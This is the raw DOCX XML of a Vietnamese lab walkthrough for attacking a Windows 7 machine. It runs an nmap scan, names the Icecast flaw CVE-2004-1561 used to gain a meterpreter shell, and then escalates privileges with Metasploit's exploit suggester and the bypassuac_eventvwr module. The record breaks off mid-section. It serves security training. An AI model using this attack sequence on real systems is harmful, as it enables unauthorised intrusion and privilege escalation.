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A820C6" w14:textId="5E73974D" w:rsidR="002F49FE" w:rsidRPr="001406E7" w:rsidRDefault="001406E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001406E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138059B7" w14:textId="3DFE74CF" w:rsidR="001406E7" w:rsidRDefault="001406E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0056318B" w14:textId="05B73F79" w:rsidR="00FE428B" w:rsidRDefault="00FE428B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004756FA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -A -sC -Pn 10.10.11.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33146EDB" w14:textId="4AA11A56" w:rsidR="00FE428B" w:rsidRDefault="00FE428B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45EDC58E" wp14:editId="5A4850A5">
            <wp:extent cx="5943600" cy="56775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5677535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C2D49" w14:textId="33B400FD" w:rsidR="00FE428B" w:rsidRDefault="00FE428B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B96C8B2" w14:textId="681F996B" w:rsidR="00FE428B" w:rsidRDefault="00FE428B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE428B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi quét máy ảo, chúng ta thấy nhiều cổng thú vị đang mở. Tường lửa đã bị vô hiệu hóa, không còn gì để bảo vệ máy ảo. Một trong những cổng thú vị đang mở là Microsoft Remote Desktop (MSRDP). Cổng đang mở là: </w:t>
      </w:r>
      <w:r w:rsidR="00253F9D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4D9EFA" w14:textId="7FD88F05" w:rsidR="00253F9D" w:rsidRDefault="00253F9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F3A77B" w14:textId="7C0A36E2" w:rsidR="00253F9D" w:rsidRPr="004756FA" w:rsidRDefault="004756FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004756FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gain Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE86DC5" w14:textId="7A068045" w:rsidR="004756FA" w:rsidRDefault="004756FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6673DCF6" w14:textId="29690706" w:rsidR="004756FA" w:rsidRDefault="004756FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cùng nghiên cứu một chút về 1 dịch vụ đang chạy trên máy ảo: Icecast. Phiên bản của Icecast chạy trên máy ảo bị lỗi nghiêm trọng, lỗ hổng có </w:t>
      </w:r>
      <w:r w:rsidR="00241600">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>điểm 7.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F3FDB" w14:textId="3E8183C2" w:rsidR="00241600" w:rsidRDefault="00241600">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A88318" w14:textId="7E2A541F" w:rsidR="00241600" w:rsidRDefault="00EC6679">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loại lỗ hổng là: execute code, overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA23D8" w14:textId="096DF59B" w:rsidR="00EC6679" w:rsidRDefault="00EC6679">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A73F082" w14:textId="46AB1CD7" w:rsidR="00EC6679" w:rsidRDefault="00EC6679">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Số CVE của lỗ hổng là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6679">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2004-1561</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536F223" w14:textId="27F3ED6D" w:rsidR="004756FA" w:rsidRDefault="004756FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E837BA" w14:textId="1A559165" w:rsidR="004756FA" w:rsidRDefault="005E6EC9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA71910" wp14:editId="7B41A55C">
            <wp:extent cx="4780344" cy="5104774"/>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6" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="7167" r="45667"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4786910" cy="5111786"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7A0FD" w14:textId="22A7E6D3" w:rsidR="00994509" w:rsidRDefault="00994509">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4EE91F" w14:textId="6BDB86A9" w:rsidR="00994509" w:rsidRDefault="00994509">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC9FC93" wp14:editId="2680CE01">
            <wp:extent cx="5943600" cy="13881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
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1388110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D4364" w14:textId="68AF45AB" w:rsidR="00BB7E23" w:rsidRDefault="00BB7E23">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27109201" w14:textId="07E0CFBA" w:rsidR="00BB7E23" w:rsidRPr="00BB7E23" w:rsidRDefault="00BB7E23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7E23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DCB1A" w14:textId="18B5934E" w:rsidR="00BB7E23" w:rsidRDefault="00BB7E23">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5E88A4" w14:textId="77777777" w:rsidR="002C4FF0" w:rsidRDefault="00BB7E23">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta đã thâm nhập được máy của nạn nhân (gain a foothold).</w:t>
      </w:r>
      <w:r w:rsidR="002C4FF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell chúng ta đang có là: </w:t>
      </w:r>
      <w:r w:rsidR="002C4FF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7AA4C" w14:textId="77777777" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FF30A8" w14:textId="4FDD037E" w:rsidR="00BB7E23" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Người dùng đang chạy tiến trình Icecast là </w:t>
      </w:r>
      <w:r w:rsidR="00BB7E23" w:rsidRPr="00BB7E23">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dark-PC\Dark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3623428C" w14:textId="6CDBE977" w:rsidR="00BB7E23" w:rsidRDefault="00BB7E23">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="151FDE2D" wp14:editId="11FF3610">
            <wp:extent cx="2730500" cy="381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2730500" cy="381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B985B43" w14:textId="2EF1FBDF" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14586E62" w14:textId="0D18BF97" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hệ điều hành:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 7 (6.1 Build 7601, Service Pack 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD9361" w14:textId="6837C01D" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiến trúc máy tính: x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013468DB" w14:textId="3DD20FF9" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22FB9943" wp14:editId="32F1257B">
            <wp:extent cx="5511800" cy="147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5511800" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB8B77" w14:textId="19C11414" w:rsidR="002C4FF0" w:rsidRDefault="002C4FF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2BF060" w14:textId="3EC24EBB" w:rsidR="002C4FF0" w:rsidRDefault="000F16D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bây giờ chúng ta đã biết kiến trúc của tiến trình, phải thực hiện recon nhiều hơn.</w:t>
      </w:r>
      <w:r w:rsidR="00F62953">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong khi điều này không hoạt động tốt nhất trên máy x64, chạy lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C78854" w14:textId="35C5D19D" w:rsidR="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01073860" w14:textId="3FD34B8D" w:rsidR="00F62953" w:rsidRPr="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62953">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28064321" w14:textId="134A19D7" w:rsidR="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCE0036" w14:textId="2CD0FB16" w:rsidR="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Điều này có thể làm cho máy bị treo 1 lúc vì nó kiểm tra các khai thác và mất vài phút để hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D34B0" w14:textId="0F1B2F8A" w:rsidR="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FB6E51" w14:textId="71C224DD" w:rsidR="00F62953" w:rsidRDefault="00F62953">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chạy module trên sẽ trả về khá nhiều kết quả  cho các kĩ thuật leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D38C8" w14:textId="56482C4B" w:rsidR="00606FB6" w:rsidRDefault="00606FB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D818B5" w14:textId="2B7C1466" w:rsidR="00606FB6" w:rsidRDefault="00606FB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D53625C" wp14:editId="71CB9E12">
            <wp:extent cx="5943600" cy="21170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5943600" cy="2117090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52274A45" w14:textId="700413B2" w:rsidR="00606FB6" w:rsidRDefault="00606FB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67748CBF" w14:textId="548C0A82" w:rsidR="00606FB6" w:rsidRDefault="00A04314">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chọn khai thác đầu tiên: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04314">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/windows/local/bypassuac_eventvwr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C0155" w14:textId="7F4BE720" w:rsidR="00A04314" w:rsidRDefault="00A04314">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E587121" w14:textId="2A243E35" w:rsidR="00FE428B" w:rsidRDefault="00A04314">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác cục bộ yêu cầu chọn session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B733299" w14:textId="77777777" w:rsidR="000F6934" w:rsidRDefault="000F6934">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A2E32E" w14:textId="209E9ADA" w:rsidR="00FE428B" w:rsidRDefault="000F6934">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBFAE34" wp14:editId="45C960D0">
            <wp:extent cx="4772220" cy="4583575"/>
            <wp:effectExtent l="0" t="0" r="3175"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79721" cy="4590780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA7687F" w14:textId="5460BF08" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8D6927" w14:textId="51822BB0" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bạn có session 2: tên người dùng cx là Dark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19673702" w14:textId="70610857" w:rsidR="00674F73" w:rsidRDefault="00674F73">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5589F301" w14:textId="283C61E1" w:rsidR="00674F73" w:rsidRDefault="00674F73">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F83B986" w14:textId="7DFB646D" w:rsidR="00674F73" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Session 2</w:t>
      </w:r>
      <w:r w:rsidR="00674F73">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có đặc quyền SeTakeOwnerShip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B930AEA" w14:textId="3048B471" w:rsidR="00674F73" w:rsidRDefault="00674F73">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
